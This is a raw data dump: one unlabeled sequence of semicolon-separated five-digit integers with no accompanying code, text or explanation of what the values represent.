57434;33171;53082;32861;42150;22332;23351;36663;25768;46762;45662;43486;63698;42485;57702;52789;53565;14640;22896;24941;20114;39075;65045;47677;66355;23494;48384;41974;34105;56979;24728;64433;45677;33062;15905;37805;20655;56515;61007;58882;64449;36984;37706;57399;47457;27463;65258;43111;21393;29136;59976;40511;44891;64383;22225;15429;34576;27818;26650;25425;10681;46490;66352;21827;32375;34330;25262;61177;50650;40651;28300;10049;35732;42633;53079;32600;48899;49100;59660;34564;56229;58606;33599;65043;51866;15178;30307;40764;37645;44419;49063;42700;21822;60533;52542;59608;37297;57189;15346;49126;31168;65157;40649;49578;29621;29707;46632;57427;31589;47667;43691;51365;22846;25607;20005;60490;47801;12366;42644;66889;40157;47727;25583;13550;15911;54506;47322;36229;11492;50532;53869;11687;64185;16572;43681;17492;60464;21222;62124;22142;31081;19685;43909;59187;26675;10252;39748;31916;49294;23637;44984;30893;66915;42892;21512;48336;55542;23909;55874;38327;14944;64959;37440;50387;43037;42695;53146;65916;50786;59741;19467;27351;42160;65498;13835;30814;15152;22808;20502;44737;37491;38177;16985;36346;47228;24661;41505;59762;24044;20888;46855;29271;43924;61748;18165;52080;59690;23695;34322;63661;11096;64377;45316;20106;42930;47276;46577;33163;65000;41556;17292;30692;15866;44793;13932;14165;39091;24949;65345;42234;27646;51307;52899;19637;56991;22234;54428;43946;55887;49917;43874;10097;41213;66408;20941;23062;23269;49702;27992;55079;57229;11117;22616;21173;64617;33560;12707;33419;19211;32438;54866;66051;32053;62406;18128;47146;34899;10443;29017;13118;40963;13013;37979;62611;11157;43535;49631;53034;18131;33231;60416;58909;36396;14560;26190;22243;13451;54817;13627;16081;12553;41952;20498;63206;19299;16711;38906;11460;33112;61908;14549;56887;55876;31051;48915;20100;63421;61364;12777;54504;53700;49825;25088;29294;59808;53417;37411;48260;40743;46004;43353;29112;40616;53244;14797;52412;44708;20961;31326;31254;44906;27685;17725;36253;53039;25802;15128;60399;59442;36012;15877;46295;28562;36371;58366;55008;58304;11746;59589;32482;63916;50993;34412;17386;28007;48895;20184;22367;49135;37167;53994;36103;49353;16675;56728;46373;31568;43653;22378;15086;42339;12805;53910;25929;21125;22403;31625;28500;25809;36419;24517;48273;57924;62393;56345;33406;28920;66741;29015;57196;38017;36321;18641;15156;64675;24881;20815;63885;64805;28956;22534;16634;66124;50801;12775;33224;21946;38945;21482;61061;63029;54971;52107;19678;27689;24824;15593;56635;33999;11030;33900;25278;61968;51674;31405;26298;21779;18125;12577;27150;25241;52951;29851;34600;40084;40091;20208;54089;38014;43249;39542;64214;37702;22520;49348;24539;42251;27643;66605;23340;33628;17121;58001;12972;32672;43261;16506;50390;38270;12331;52943;42991;36614;61654;50873;64204;32912;28301;30436;46797;41633;58039;33288;35406;52444;49313;51044;40703;37816;29863;59022;30220;15408;21188;42500;37545;32015;27452;61863;62641;25648;66783;23649;17782;49635;44460;31973;57361;52574;31856;20491;59794;57055;31273;25218;22989;19323;56432;36198;40567;15312;45565;34041;26178;29106;64504;41956;36294;59103;19180;25046;51164;32322;63443;58443;30703;38984;19817;55460;14081;58112;38388;65269;13775;14680;37727;26546;20877;51517;42383;50410;28829;60463;41349;57979;26926;41022;61097;17073;33253;55376;46555;32221;34966;65075;23126;25198;60901;66116;55317;61221;43941;65836;18163;34244;35054;49901;50264;11242;24392;44536;61696;65028;59312;15565;62897;53985;23087;22096;26238;11260;62674;10531;25955;55746;61033;56622;19414;36945;18733;11144;35355;25109;44507;55948;35154;39313;12743;47853;26805;59766;25316;10941;21598;64425;23013;10844;13961;53260;35210;64257;35906;57707;48182;33430;25098;49337;31552;36500;30357;41835;39971;31296;44684;62633;36610;25796;28353;28259;59907;27454;39152;52277;19726;15319;52249;21565;19261;33489;59292;62807;42957;20338;58416;19232;22179;25401;47893;33026;10616;40014;59209;16514;37872;32095;28229;20451;53097;51678;58917;23203;22716;55531;61681;59237;33202;17729;30765;58881;19090;41180;54305;64514;41024;51536;45923;60176;62973;56489;53360;46808;52658;47158;40039;18988;23401;19129;56364;22899;57407;22327;64066;43684;60499;60739;11914;16831;41635;41007;41788;23245;11345;23860;32283;45784;20136;16663;39302;12913;28789;22402;16458;66898;31129;28907;42144;54151;24192;17031;39231;36036;25786;22126;56823;50894;37549;10932;12608;10506;63791;18842;41316;33868;30507;10840;49494;17640;17840;34034;66681;39810;41682;65874;37919;58257;20057;65962;63909;59193;15805;54932;24162;42634;32264;12478;61938;40285;46263;58949;43233;60282;61277;26991;24454;60625;36906;26889;27017;56222;27276;27400;41497;50419;52426;26030;23885;53599;31393;12354;10648;51567;55775;39569;59282;15049;25771;49112;33633;23308;24288;43186;15611;26387;63821;32587;21336;19142;42103;51215;38891;26401;24077;51192;60824;34441;27189;38794;23390;43210;39707;29930;31452;37072;20601;29861;16250;50962;48700;55166;49489;66850;42403;18107;62789;38402;42198;22675;33215;41953;66118;35259;55845;48385;49122;48329;12468;43911;22969;18936;41017;29741;40942;50114;11624;41230;56272;39658;44902;37661;54198;21277;43747;60082;11906;60435;63304;57482;21244;36137;60054;29340;27038;20509;19914;30043;38496;21832;64329;35710;64242;24957;18515;61501;13908;42221;17080;62743;53320;40220;54395;40037;50055;11931;55202;46705;62909;60806;20637;56625;49061;33564;24612;46615;22124;61393;61237;17995;63320;38346;24336;23789;31817;46356;35836;17103;10578;16505;51089;35902;42795;42903;60836;29379;64044;28450;55581;53820;25470;36642;50455;55346;34132;43843;58552;49279;44003;56208;60460;51132;40886;58436;55423;45199;29838;19755;30754;23385;55997;20992;44892;52175;53151;19979;37744;26654;45523;62064;65273;36146;29945;45123;15321;24154;33971;46778;54925;61683;64756;30118;43969;54577;28224;31216;47537;31907;48426;13100;22213;29266;14145;32290;26056;40183;39811;26127;39230;63744;56701;29025;44208;16853;55353;24391;32506;36712;17403;37109;60597;21659;46643;23275;65204;14653;32938;34271;58662;62082;14847;37324;52671;38333;10656;34053;42225;57777;22514;61607;52108;53909;15197;14497;16771;51965;43791;41761;22840;11524;35465;28423;24415;51942;16213;61941;53921;40579;57817;43696;49184;52151;21698;54455;51357;39137;32394;11239;35503;14360;28208;24489;54266;43092;61339;12482;20111;41969;42637;61659;24847;31911;36773;50798;33220;21016;17453;46463;39995;42964;54115;30363;63938;61594;33114;57932;46774;43641;48903;51484;13974;56889;42304;35013;16962;60071;15812;58820;25964;13303;19632;50062;61599;16421;44995;46462;57516;55930;41960;34724;14391;39477;65968;22912;41129;54955;16091;52667;19866;11599;27473;24845;66498;49547;25624;62896;38925;10695;24866;57053;64437;40419;25317;28109;56114;60966;26834;23399;64993;15955;43877;35675;59524;36652;34283;49467;49812;31991;65815;63022;29488;64054;41348;47857;43545;27591;36147;20197;33842;59251;42402;50958;27171;30281;41674;57686;62161;24914;32986;50138;61429;11605;31555;25923;20260;57440;46924;53814;63167;29534;51193;34839;32946;10426;21308;28400;65255;44636;53715;36667;11388;18868;62763;42175;24812;55683;21421;55693;61495;22084;62371;31022;66505;22540;60577;25887;23072;52167;31359;15193;44437;47851;21025;59413;47506;65211;36907;49297;16519;14683;38325;55919;58722;11911;57658;10715;35590;46638;22781;58547;43199;15854;45440;10297;28165;58629;25847;12340;17417;45279;22619;12001;24677;12255;18326;26057;21477;49096;40989;44020;62133;33091;56263;65816;65864;43841;19326;36013;35577;21091;38083;46737;61228;19171;29603;12369;26797;39904;43099;10696;51111;21509;19705;55310;39353;26955;40582;29996;60291;29073;42970;46650;14801;65883;14509;38747;42453;55534;30140;61232;33802;57594;33612;36581;41919;38421;13099;26982;26059;66060;11358;17467;39765;27083;34086;11051;22151;51163;60865;58465;59572;59563;54872;32350;28913;13234;50298;23200;55437;36503;15356;52489;49425;60306;66120;54298;62301;24424;21667;17596;40172;14030;12126;29013;44682;60378;41566;28473;19094;59750;17354;61425;64838;48218;29074;39328;51047;27381;58999;12363;66542;10916;24733;50744;42997;41377;49236;36848;26180;45144;56782;19401;19797;51100;36174;36734;53936;24241;20511;20215;15160;26815;45174;36833;30272;58458;35041;16642;31365;48998;25503;15591;47099;66091;63935;14216;33429;20796;40931;58115;29751;65500;35097;55809;30848;29642;43971;58104;50923;62653;24123;20202;61866;35265;22867;56591;66704;41833;19819;28565;45750;49201;24467;33199;41189;34814;27211;18104;39447;22560;17542;18648;37470;56503;30480;40013;21856;22385;16750;47490;34143;50464;54806;18663;48991;36024;24115;66613;44728;26842;54559;60599;30137;40466;48829;50102;58840;42209;32840;30585;45187;28828;25273;25517;60784;44462;54159;59765;49671;56532;50886;21469;56387;29363;38397;30136;11139;64612;54479;37781;19060;53598;22481;37037;21322;52300;24381;24563;19043;35261;55143;25522;55087;28994;27843;20049;30310;14750;65992;35390;11577;34769;60301;41252;52591;65181;50496;52389;46864;44073;23075;49484;29235;66829;15659;57182;48659;65066;11908;26053;60485;65709;30047;26690;44412;43457;31268;60546;11152;19312;48701;26271;21910;30697;34524;51811;14566;16016;50813;32391;37931;41548;15555;41715;64497;60525;25077;37975;59058;62529;28190;34688;51525;51401;31605;30353;46332;12333;47313;49584;32396;37200;53558;18225;27453;44432;53252;40965;25212;24814;24580;64283;49205;52498;54331;21438;22366;22041;28414;32513;10371;12572;40047;30805;63922;36083;27729;64310;55387;36585;37280;29735;25732;27335;43949;16371;40103;36955;56349;57423;33350;28793;50899;27029;37804;64367;21472;20542;61145;35515;22816;56148;46584;56561;58781;31844;14218;30007;12951;48843;60663;27763;14309;40189;53204;53158;65824;16651;28588;65467;21722;38432;37613;23257;54409;53299;26629;39000;54980;31124;54760;18137;64821;66660;46556;61453;24679;11766;50323;35614;18543;32353;63674;62961;57662;25931;31738;30846;25135;19222;44328;51364;55786;52275;54129;45145;24292;40444;59739;18081;50495;61723;36844;40486;18644;39320;52983;44282;23467;33362;16605;32340;37001;37577;58160;57994;22815;31203;34453;28584;64717;55473;18073;24737;59165;14229;27592;32677;47395;10901;62656;18044;30942;18057;49843;24416;59724;44600;23517;17633;12630;34227;21676;55622;63489;66793;52428;56914;45937;43658;30111;11261;32398;36114;50947;63164;57763;11375;46218;12993;25024;39066;10152;52588;55238;22185;57179;55407;62803;12923;14338;13762;12605;13863;44874;29918;33063;50211;43964;34964;34726;35368;14428;45443;10002;12891;26595;40851;17532;47601;12826;32620;38708;66324;22051;42628;21846;54635;65251;52812;50058;65925;23225;41666;53322;52831;26108;53505;18269;61371;54807;33950;24691;18981;55877;65064;61252;45026;27075;36411;46702;57069;20510;59701;30462;16251;47070;16029;23903;50177;13568;47800;44719;11176;46467;66923;50195;63091;43483;26579;35523;52686;50661;51547;33294;37168;35825;16612;32695;63457;66064;21039;26391;41789;56592;12407;10985;42114;43627;50012;42123;36713;57324;40206;20662;25560;36399;65418;55157;54274;44609;59299;37435;34554;45505;31901;46894;54352;41724;44087;63763;41077;23754;30632;19016;12784;28810;62460;41542;13621;60136;54473;39593;13806;42215;29343;57644;60743;31897;46594;14936;53923;48637;36686;40862;65698;58601;53183;58390;45137;30275;25970;35337;50269;10577;50450;43688;48248;14662;60702;22460;34409;29759;39470;13491;26612;19901;23971;29907;51696;21743;60608;25230;39452;15936;23536;65129;55512;65331;42800;14802;51414;48433;36234;55862;34261;17288;39132;59784;32349;54586;11619;35998;66063;52879;17070;63449;11612;23702;39040;42060;53760;17282;33085;12988;58108;51224;66873;59069;14062;43763;31053;23647;32872;49695;35531;30050;63367;32099;66678;14531;45941;36871;47179;11526;64758;21608;58473;31834;60042;30963;20352;31189;56881;37438;43940;45589;33348;58336;22380;43662;18549;42630;42635;30723;66743;56600;63081;28766;16385;24296;42581;15824;15430;31064;63371;15265;22015;26899;60120;34357;25793;11629;30630;15534;33098;56439;30854;14366;60379;46550;13178;36529;64841;63708;18681;44136;35510;30607;55195;57061;51273;10790;38160;41572;17074;50978;29262;51112;45116;28282;31239;21909;44308;43767;45479;21121;53939;58983;19189;12912;41389;22121;47556;41922;44602;47523;12911;65382;13453;64659;32464;56809;66164;58526;10346;63301;65336;22790;49630;45776;16033;16971;32668;37793;57978;62676;10744;25516;46110;47220;48793;50768;47072;41774;10462;35831;19469;17122;37944;49979;64944;46554;53000;12625;17650;11022;51303;64979;15131;52404;38356;26636;47615;60572;13708;32049;50931;40971;25618;16613;38249;23300;35973;28042;36464;29067;54139;44865;44175;40687;43253;41613;65324;19017;43980;24378;52869;30623;49471;10402;21310;19420;60066;60875;57323;46783;43476;29968;60934;48590;52069;15246;52142;28934;17275;18785;47673;23938;43176;32845;57286;43594;58641;31085;16809;38086;28410;22065;60814;16995;19620;11764;23741;65997;13682;26318;16591;17761;29572;52073;58226;62518;44644;34644;42482;32696;51178;27095;12959;37271;15129;19608;30919;62702;53655;65852;22020;43611;15872;16955;49738;16319;28552;56644;50216;63775;60633;48506;53808;53611;33979;24104;62403;38519;41196;23079;24001;64482;23098;66053;50011;58147;59984;54295;11160;50953;14191;21693;53893;15893;40837;30561;14610;42954;23470;65822;32975;13737;47399;43692;42865;64187;57567;51356;47768;20159;26939;38375;55464;56232;61205;60870;42291;25495;11255;46419;20135;14090;41150;55980;36745;20568;18683;31865;62080;35376;12633;58460;28433;55094;26666;10957;26756;14104;57148;38066;49187;48513;39129;23438;45809;34200;20480;36786;19182;47747;58891;45859;56160;25125;29240;15472;20016;14292;44189;41258;42660;15862;58138;42769;46617;55127;62931;21353;20751;50903;57356;21263;62141;39610;39092;11297;22919;21586;48767;61791;55807;64480;28478;32874;66267;62057;52022;39672;31089;40765;24343;64850;27212;44012;20897;63218;48763;57834;14911;36692;62799;35968;41783;32318;42133;16048;18255;13624;65863;33033;16741;48183;56445;17027;18482;40796;50122;62751;61481;35877;45900;60248;61686;50360;21726;13881;34963;22685;26880;55960;20250;54166;43116;13957;24523;22718;56904;30058;53012;37700;22796;18761;23001;42354;37493;44922;54957;24969;50164;55259;59363;30913;44343;61662;46914;51915;34846;36297;59300;30252;52982;56238;37897;36864;15653;23793;53743;54972;31619;52174;30160;30292;38319;40256;25926;11465;23716;29145;42506;13001;19297;11872;29681;17805;27828;59833;20611;41124;24876;23640;27599;30217;22299;46943;13795;34312;50715;41577;25532;34972;45985;61845;16815;13965;48999;55682;45040;30743;44540;10422;29782;63975;33963;38256;47034;29625;26554;58793;63710;39963;50046;66166;35841;31822;33078;59007;53647;30653;28651;35656;49443;14956;12746;30257;54729;65944;45032;47817;22835;45558;60923;36330;12101;39557;17172;40674;41688;36647;35541;50424;59272;26877;47616;10264;27939;37951;34802;53748;44107;11442;66307;17609;64969;19917;27363;53170;25596;47629;50036;49597;63075;50252;34707;42577;24572;61895;24551;13323;44408;15001;54204;40794;25107;12372;37387;48682;19457;56290;24257;53388;45800;39345;29429;36395;41012;12123;16186;13393;39330;58773;51211;19687;65083;50320;59743;65985;24671;62497;60491;35302;43362;47169;53377;34063;65272;21979;66160;35936;31999;12010;20663;38914;53793;11449;60314;47651;45525;65159;62755;22580;58488;64665;13309;31228;32128;28049;12722;65984;10542;51377;18791;54012;28277;33969;46563;42059;31435;19536;29745;22125;16432;40185;46057;26904;45745;14744;36093;15665;17179;29933;31330;11606;25794;48206;20321;46832;31949;15818;34562;13958;18713;23051;32860;18754;64133;59039;59166;14862;20562;51003;53371;57249;44264;32853;13759;63848;10432;24809;13963;50735;49847;19672;55086;50743;13129;32864;65341;20323;15857;61189;35504;60449;13822;15011;30700;55438;58855;31260;42040;31238;12509;22296;47265;40029;30530;25654;51310;15414;48746;49153;22553;49448;64832;11711;13926;65871;26423;28979;15896;26457;40240;37139;32168;66675;59955;62084;22458;18416;31323;24767;55707;65851;65893;12265;13510;45156;35829;25831;56487;61974;44210;35718;57637;58592;63576;15248;15014;46546;49748;57813;18956;27175;31953;37303;28739;12715;48233;39766;46976;33575;35141;46048;39461;55965;44679;62121;66516;10203;44220;54243;16439;22837;14308;41225;30156;61553;61728;14502;44022;31135;34240;33852;35793;11270;38383;35975;62305;57135;24420;33416;51281;47631;20652;52525;41838;64523;27106;10345;18405;30601;16190;15236;35304;36077;19904;11020;59967;66188;13990;59811;52240;10040;63559;61596;66004;65412;18871;18034;25037;43987;43228;42277;42813;49763;20417;49797;21104;37270;51514;55296;15224;61627;46865;61460;62486;22073;62329;23288;15260;39885;31733;54489;45772;14005;54411;23881;12963;55570;38529;63794;17818;23692;32931;41986;56394;39133;39518;43529;23522;28654;53982;62005;27642;29080;27487;23096;24340;59715;51005;54279;12087;31601;66667;54345;14514;15133;16825;17148;48481;57241;11286;18755;42457;58194;55393;28564;57388;66277;61375;47550;61496;43878;64844;18181;45528;16832;54637;55123;57273;65385;43518;33396;56074;24823;42479;32532;25739;34640;58696;28690;35229;13497;12861;65565;30393;54404;29425;38299;22966;29598;35605;12829;13934;60878;13988;46241;20740;15194;57492;32363;26545;59570;37326;52306;64760;12329;25397;21234;51922;32839;66436;41158;19642;61957;58944;60843;15685;66577;34552;14856;50767;59163;55698;26548;50277;65667;47532;27816;45657;59366;17068;43596;29158;45291;44605;41091;24868;36112;12403;18150;24287;59418;47021;32178;57665;21703;62852;48441;53102;45557;34058;51706;36845;11190;65152;14780;45129;17611;41102;44726;53876;64581;62690;53269;54186;25540;60535;58746;22222;36519;56025;45148;52753;39265;62443;36182;45975;43507;19863;52706;45812;65959;42252;43548;56429;25112;48251;65855;39686;35910;27053;40785;66294;28098;39798;22700;41103;20794;42475;63370;33326;24641;55365;21442;35167;40292;11541;46997;54002;65213;51285;62555;37531;44857;20365;49640;52602;54442;61126;59444;57669;66650;61088;41842;44049;60015;18659;23660;42420;18534;40602;33145;50040;45086;18640;36584;44754;40532;65013;42398;65806;56199;22833;11894;29633;42192;56868;28713;19728;22608;14285;35911;46387;47264;62716;29715;29744;40469;40070;23623;19494;50516;11731;43304;39207;11521;40190;43927;64338;53468;59916;15210;28021;32952;17338;42670;55649;52742;54165;26867;20372;63343;44525;11494;47630;39795;33084;23057;40908;46945;48963;38134;14642;62016;22431;34559;30334;48512;62864;45304;57793;65420;41215;13206;50266;38624;44762;18095;47520;61564;40742;60065;25645;39101;19216;45626;63516;60929;57127;18378;31917;40682;37370;34218;40396;47765;13418;38304;15884;44053;49815;21540;42309;28714;22570;59915;21235;66594;31427;23768;32050;16495;39516;27989;55489;51260;58093;53665;44319;31843;14938;46652;47659;62456;34961;11610;54147;10037;14609;39790;66333;37729;57951;40910;57626;19096;49124;52397;43623;17685;60592;49559;66272;21720;60955;37961;38734;15110;50739;21637;33203;40109;19042;28893;29946;18345;56279;48960;30108;28140;36486;29012;32220;23219;50247;41108;37284;53197;34281;44413;16722;53300;28595;56213;46896;35890;35483;62587;43173;25576;46676;22629;61417;61744;48153;38034;45444;31575;15543;17062;29978;47655;36879;55109;44533;12504;48598;15126;13346;65286;44695;33608;40804;37582;13677;40223;29665;11249;47433;32525;11750;31782;23633;29215;54875;24017;37936;45294;58059;56759;14513;56366;61260;27287;42027;33257;24040;18323;36228;44392;32991;27797;28377;38393;58324;44678;16801;54905;29793;48665;58204;27972;28912;59223;31242;44470;38803;46197;66890;40449;66939;58202;62705;51770;27205;52783;21853;16976;35457;30879;12510;35798;58649;32392;51462;51139;29460;49679;35896;58716;24598;49876;15723;11008;45227;59360;58129;17086;25757;66007;49707;47662;29808;44973;12686;10704;23584;66145;24833;10313;20517;63563;21627;48932;61073;56870;55815;53350;59944;40026;17409;41739;32091;44233;46249;49152;49291;66597;37512;30138;38741;35093;25515;52823;65624;66429;62357;52383;27920;29656;46523;39430;20409;42010;19730;63237;31317;49507;48600;59487;30785;24709;58410;60409;30489;31883;31100;33882;13495;48479;39884;63253;59003;12611;15783;40279;36329;53488;66673;46176;13288;24794;17778;11651;29768;22062;47591;35618;63780;54444;25276;64600;37055;56311;11387;31770;30732;66058;52171;22453;22537;39178;57213;39927;43005;46701;40286;42239;22865;26309;39282;53583;30074;21501;28710;53855;59258;11584;17270;16023;34882;21949;29900;29048;23233;64536;15775;60187;46887;59583;45912;48838;44909;44424;40146;12074;63932;11626;51604;31980;40373;16436;60020;59332;56392;62983;34533;66935;60756;54778;15744;60389;26767;43944;19972;18331;12998;66196;50877;58633;44722;31933;42549;50672;57231;33376;30940;45051;18180;57316;21593;51434;57029;27216;17109;51721;21974;22309;47722;39729;48642;22032;59671;33395;15765;45492;56988;34861;55010;11071;50281;57404;57420;17097;52432;24788;34751;64260;45384;44899;64420;47897;51095;35858;61311;44102;58472;24022;33509;41885;38817;51879;17589;14777;50934;60152;53851;13474;50989;42727;35408;60724;39816;43761;47697;11237;17652;56318;11447;24121;65831;20561;42368;33870;34863;54550;32141;56607;32950;48519;57603;57829;33118;50220;61872;26184;53770;20207;28541;41046;20791;36069;57502;61987;49641;38531;58489;28626;35737;32646;29462;38957;21314;14455;34133;42998;40574;34636;55018;45977;17524;23534;14774;45965;10159;60733;65124;31496;17360;14445;45646;31812;66737;36690;40077;44285;60293;49235;15544;18022;25108;22785;48357;10183;10139;24006;26123;30020;65304;35122;28757;33708;48906;61657;63205;42856;15962;27233;30214;12984;21181;62280;65100;37849;59902;32406;61365;62574;58431;61142;63264;56505;47703;19989;44656;16830;60659;22649;44464;63581;36861;40454;36241;57899;54634;63702;43868;50787;57690;42979;35563;23975;37524;53717;34259;36224;56863;17498;21371;20730;63604;22964;41074;35062;61383;34337;65639;54113;51045;12433;58322;43815;21303;28635;19731;53578;64390;65081;53239;27759;48257;42268;65347;48500;57188;17642;13152;39489;10312;62469;41039;41207;63379;45694;61976;31233;21939;42612;18609;27337;15806;63047;26516;33372;60361;46312;59435;45112;20919;54913;42585;17213;34695;13730;41324;26639;39506;45306;13687;38070;61507;54708;66247;12732;51274;15183;28055;55597;24452;53626;29527;37642;60407;47025;28335;55246;66087;36703;63374;66016;46581;52117;27703;28160;42608;30079;21138;34997;39727;52519;44236;57329;42750;34992;57875;19571;10389;16790;11805;33482;35474;19114;40411;19822;39753;55792;44363;50156;32067;59267;63328;66056;11428;48790;61891;51938;36194;24256;21189;22595;17793;17028;48470;65961;53359;15972;42683;33433;30709;35713;14046;39726;22220;16589;22464;64640;33646;63686;33324;27938;23843;45683;55308;20464;14318;37382;17740;25484;63798;43033;13055;58888;48444;24413;60251;17253;66139;38426;62726;18306;30182;38947;32224;63677;39392;63260;14957;29887;43332;53827;50806;34818;49229;58762;58906;37164;59092;65479;64516;40618;60917;48865;64175;63247;32288;38746;64326;48831;64247;58976;15629;13212;55129;66823;19771;65381;26058;16818;22772;64505;19349;28444;36356;39208;34338;17346;18610;56743;20852;63984;58995;27164;18091;46436;37009;39010;49911;10556;32547;10388;63125;33603;29530;21962;65234;55312;53938;31787;10003;30798;10465;23018;54554;51507;66462;12790;16839;14014;47006;13408;34099;31851;37638;24477;15675;27996;12622;26227;55785;29300;39603;42681;50154;44873;55397;64870;37745;43027;42419;26723;52767;54043;53792;13738;35786;29114;49765;15465;41310;32274;19939;40926;18688;12481;29731;62810;12125;42126;16918;53703;20034;53554;14731;31494;39331;20799;23366;43588;18778;24217;45892;14542;41846;19425;12017;32360;49137;13083;65319;60221;59315;49319;48898;29201;55778;37987;23904;52592;65307;30289;35818;17438;18188;42116;63380;56699;47905;31403;52553;34008;62093;30537;38546;45092;56792;44591;17116;23181;31717;22019;10161;22996;54997;26530;30575;40823;37940;50663;34110;27753;11933;58896;52194;17092;17458;65902;13084;55228;50337;52689;19313;36724;33713;33222;46223;36762;53384;26416;24490;35637;27658;39907;35724;24587;32418;26028;27982;26757;60382;64605;36171;56185;14732;34117;25605;17084;38610;38219;29227;38703;17143;57297;27133;64106;63742;43443;57982;26895;43792;24003;51677;66191;59056;32745;52390;47783;32075;58166;25006;62929;63277;20490;28482;49583;21881;48931;11211;65186;19920;61569;39812;53372;62091;19718;26063;25091;53542;34632;50217;55203;46845;49879;55232;64407;47672;50597;61379;59110;17330;47639;24527;26383;51863;55754;28325;32292;10778;46160;60112;29253;15289;13735;39434;52009;36839;24778;39522;42645;41970;26760;21367;10930;48589;41965;64860;42380;20846;13081;57476;25320;16093;17264;41037;21408;56707;46476;55481;26476;45921;42931;49384;10474;52093;42796;65508;58022;26890;58732;26414;19351;39204;40440;49661;41870;34934;60992;24749;54847;54821;51453;14669;17355;32967;30103;18797;47376;15981;10978;62714;35332;41355;32945;56175;50921;33549;37149;47862;11252;64507;28048;47712;16999;12711;27132;35024;39048;23436;56610;66911;66579;21359;44099;60280;22061;64599;42426;11979;66870;29372;39120;29042;30731;10058;39592;16935;62081;22638;18455;23463;42115;56186;65368;63131;31951;56714;38556;25434;45715;32218;34675;39234;43984;64123;22695;30172;46227;52372;32460;39024;47733;62954;41629;33595;30405;58292;61368;31026;50317;54231;27020;55360;29580;20683;60233;61283;30878;51978;22535;62809;29020;46940;25199;51516;51267;59746;45820;51034;66897;28426;19786;34980;47191;18531;11166;17653;33880;48524;58187;41973;11955;59510;16887;48593;33304;26505;57334;30442;66340;53128;37392;60541;26430;54654;34005;53951;46765;27714;36925;62461;48787;32726;42187;37929;53027;50849;34989;61814;34625;43109;49164;41488;18909;50742;43374;55959;57964;58912;31237;29422;60852;47895;25415;44864;12063;46611;38430;13925;52409;48861;15137;40493;54439;23317;34411;21404;49810;66423;12985;56706;55480;24618;18700;38438;59304;45221;31213;47864;38602;41782;31283;10610;50228;56660;17136;61813;23659;65362;19671;34770;38448;62878;37905;30821;31988;62940;46336;46572;34609;55264;55288;23705;29273;37427;57014;50409;54689;22738;46479;11009;32619;37087;34255;58348;51373;38998;24207;62703;12093;41857;66619;56581;32404;14164;49040;65548;19750;60019;11913;19207;28738;42033;50103;56554;11625;30420;52114;57850;38394;12870;35788;36271;19982;19531;42246;15661;43852;34856;26351;45734;47013;47221;44935;45679;56933;55006;32582;41459;35542;59965;44939;15849;24237;13765;32603;22188;28166;39526;64249;59378;32106;40110;61107;65895;49035;48781;18294;13595;64807;45799;22358;19729;39935;23915;55002;21071;53628;50909;50185;27131;31731;48493;43078;52784;16161;40018;59222;34042;22622;65375;21542;57619;29637;23306;28621;46444;61961;14328;59293;14817;14138;32306;10192;38812;49316;28314;62953;23755;66653;54393;60018;63533;21284;12730;21075;65977;66951;45520;29950;62385;66918;50951;35458;16714;34013;44307;35851;19143;29208;11888;39997;53227;20969;56636;34464;41689;39801;17126;53553;10169;57306;34311;35477;30933;35444;11202;44298;65663;53277;63323;24934;38187;60888;21497;43916;60060;30985;17691;12035;39500;39944;19528;56138;13697;19742;30371;59651;20702;11969;26852;37780;61044;41156;33830;41670;47142;43204;63619;63878;22298;64498;41992;66300;60081;48420;48863;57235;44862;47203;66866;28585;45559;44331;61352;64300;19333;17333;13592;56473;38981;48651;42709;27323;51337;52052;24086;27090;63432;53271;18707;43563;15673;27424;27009;49614;45652;46244;17545;12841;27628;45222;25946;49207;34500;16927;11776;12670;45918;58045;24813;21959;11077;63832;55790;38447;20691;23867;32729;15700;62122;54242;21297;21159;66023;50169;47732;54752;46058;35274;25696;21233;47687;60313;34155;41467;33146;19564;37963;12671;33149;32268;16876;13432;26871;13971;12679;32325;26155;62646;27343;57894;32533;21107;65201;59853;13717;41140;53674;18911;65001;49133;57512;58790;20096;57187;45459;28168;63203;29974;66035;14914;50762;57585;37912;18722;13944;47147;20376;33139;22792;15253;26137;20172;46757;16928;13063;29925;45081;61856;17715;36912;54620;34052;20865;28417;60189;52629;11259;41170;63591;65982;28101;21928;62932;60545;65090;46074;55615;28104;43532;22257;27385;63518;62163;35691;46426;18106;48697;13948;64392;25352;19229;22678;43359;29003;29876;39634;35288;18183;66439;18932;25079;41458;28305;24170;28653;49487;64149;61357;40186;29961;33569;66552;60486;54292;29207;38133;61642;23519;21142;14619;47317;34495;34701;62691;65459;18569;12624;19644;17216;21912;37369;24615;41869;56385;29614;46296;37379;40293;10367;36078;42519;27862;15058;29815;38374;16649;33921;53163;53639;21206;35878;16383;23901;65758;16766;52552;11948;42395;12327;27415;58328;57379;15545;53524;45863;35835;65625;27281;48900;30681;57876;18276;65462;65684;44162;55381;15204;65099;24354;27826;57111;38917;16369;50018;59141;28075;28580;30746;44024;41399;53579;36487;65668;31370;45968;34615;42037;12326;14475;48286;27796;25393;48189;17785;52411;35119;40600;10822;15038;25664;28175;56455;62414;16523;65472;56726;26000;37968;65765;36811;28316;12059;17182;20621;46189;25123;16392;23372;32722;37122;44794;34661;29986;13078;26025;64111;45310;33297;11705;37878;60295;13365;48534;43591;31774;62315;21972;34080;12574;44867;45419;23153;47741;25022;35464;16018;17444;12348;66568;12701;26902;61469;12532;51856;28082;50641;23502;54285;20263;20743;53914;38912;51046;58255;36032;56082;53983;29365;29356;24683;58851;41562;21100;23866;34007;43193;43207;31639;66506;23627;65618;28521;42762;26884;59178;17065;35263;65749;36212;65430;33720;38674;29739;17681;23474;52512;18825;18388;53587;38744;11372;27419;40657;62542;22082;14172;66833;44802;62323;43370;45852;32971;24118;39298;31713;33892;54363;32194;33028;55021;34528;10277;40909;21448;20990;33533;55040;17484;11158;13289;15363;55282;64110;31344;16504;33860;33731;24780;25687;60070;34350;35256;53755;24548;11224;54026;61851;23508;58393;63741;23554;65919;18241;63368;56156;57543;41018;37206;45417;55450;56761;27944;41659;30415;42662;37359;66412;61605;64531;16739;51344;55888;45423;58506;52513;37728;24160;43512;33485;52002;43618;62446;19906;14402;27051;40848;22567;42306;43789;22442;39809;30414;52893;16028;18656;38504;44685;12076;49157;30662;49701;50389;63573;26473;14779;57123;62481;31170;15092;51660;30364;13985;23550;57264;33076;56479;16139;42759;48348;48501;36117;31968;23488;31727;61821;19757;23077;10566;55059;40978;47133;61674;36880;30196;49991;14306;34209;14451;40418;21861;18649;61704;40262;40341;13181;17565;58434;54136;47431;51033;43316;54023;34497;50444;10635;41106;19439;15263;18892;11296;53835;41210;27988;46502;24965;17765;20764;30669;59561;18595;45724;44463;35922;63051;26122;55562;36596;61218;38324;22491;14029;55913;23674;47841;12960;32163;